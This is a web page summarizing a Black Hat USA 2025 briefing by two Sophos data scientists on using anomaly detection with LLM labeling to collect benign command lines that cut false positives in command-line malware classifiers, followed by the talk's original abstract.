Enterprise Cybersecurity AI

Black Hat USA 2025 | Enhancing Command Line Classification with Benign Anomalous Data

•February 25, 2026

0

Black Hat

Black Hat•Feb 25, 2026

Why It Matters

Reducing false positives lowers operational overhead and improves security teams’ response efficiency, making command‑line monitoring more reliable and affordable.

Key Takeaways

•Anomaly detection feeds benign data to LLM labeling
•Benign data diversifies command‑line classifier training set
•False positive rates drop significantly after augmentation
•Method scales using existing production logs
•No need to isolate malicious anomalies first

Pulse Analysis

Anomaly detection has long been touted as a silver bullet for spotting malicious command‑line activity, yet its unsupervised nature often yields overwhelming false‑positive alerts. Security operations teams scramble to triage noisy alerts, draining resources and eroding confidence in automated defenses. The core issue lies in treating every deviation as suspicious, without distinguishing benign outliers that naturally occur in complex environments. This challenge has spurred researchers to rethink how anomaly signals are applied, shifting from direct threat identification to data enrichment for supervised models.

The Sophos team’s breakthrough combines traditional anomaly detection with large language models (LLMs) to create a feedback loop that harvests benign command‑line instances. Anomaly detectors flag atypical commands, which are then passed to an LLM for contextual labeling. Rather than hunting for malicious strings, the pipeline extracts a rich, diverse set of non‑malicious commands that expand the training corpus of a supervised classifier. This infusion of varied benign data sharpens the model’s decision boundary, slashing false‑positive rates while preserving detection sensitivity. Crucially, the approach leverages existing production logs, eliminating the need for costly, manually curated malicious datasets.

For enterprises, the implications are immediate. Lower false‑positive volumes translate to fewer analyst interruptions, faster incident response, and reduced operational spend. The methodology scales effortlessly across large fleets, as the anomaly detector continuously supplies fresh benign samples, keeping the classifier up‑to‑date with evolving command‑line usage patterns. As AI‑driven labeling matures, this paradigm could extend beyond command‑line monitoring to other telemetry domains, heralding a broader shift toward hybrid unsupervised‑supervised security pipelines. Organizations adopting this strategy gain a more resilient detection posture while capitalizing on the cost efficiencies of automated data enrichment.

Original Description

Anomaly Detection Betrayed Us, so We Gave It a New Job: Enhancing Command Line Classification with Benign Anomalous Data

Anomaly detection in cybersecurity has long promised the ability to identify threats by highlighting deviations from expected behavior. For classifying malicious command lines, however, its practical application often results in high false positive rates, making it expensive and inefficient. But is that the whole story for command line anomaly detection? With recent innovations in AI, is there a new angle that we have yet to explore?

In this Briefing, we will explore that question by developing a pipeline that does not depend on anomaly detection as a point of failure. By combining anomaly detection with large language models (LLMs), we can confidently identify critical data that can be used to augment a dedicated command line classifier. Using anomaly detection to feed a different process avoids the potentially catastrophic false positive rates of an unsupervised method. Instead, we create improvements in a supervised model targeted towards classification.

Unexpectedly, the success of this method did not depend on anomaly detection locating malicious command lines. We gained a valuable insight: anomaly detection, when paired with LLM-based labeling, yields a remarkably diverse set of benign command lines. Leveraging this benign data when training command line classifiers significantly reduces false positive rates. Furthermore, it allows us to use plentiful existing data without the needles in a haystack that are malicious command lines in production data.

Attendees will gain an understanding of the methodology of our experiment, highlighting how diverse benign data identified through anomaly detection broadens the classifier's understanding and contributes to creating a more resilient detection system. By shifting focus from solely aiming to find malicious anomalies to harnessing benign diversity, we offer a potential paradigm shift in command line classification strategies. Learn how to easily implement this method in your detection systems at a large scale and low cost.

By:

Ben Gelman | Senior Data Scientist, Sophos

Sean Bergeron | Senior Data Scientist, Sophos

Presentation Materials Available at:

https://blackhat.com/us-25/briefings/schedule/?#anomaly-detection-betrayed-us-so-we-gave-it-a-new-job-enhancing-command-line-classification-with-benign-anomalous-data-46769

0

Comments

Want to join the conversation?

Loading comments...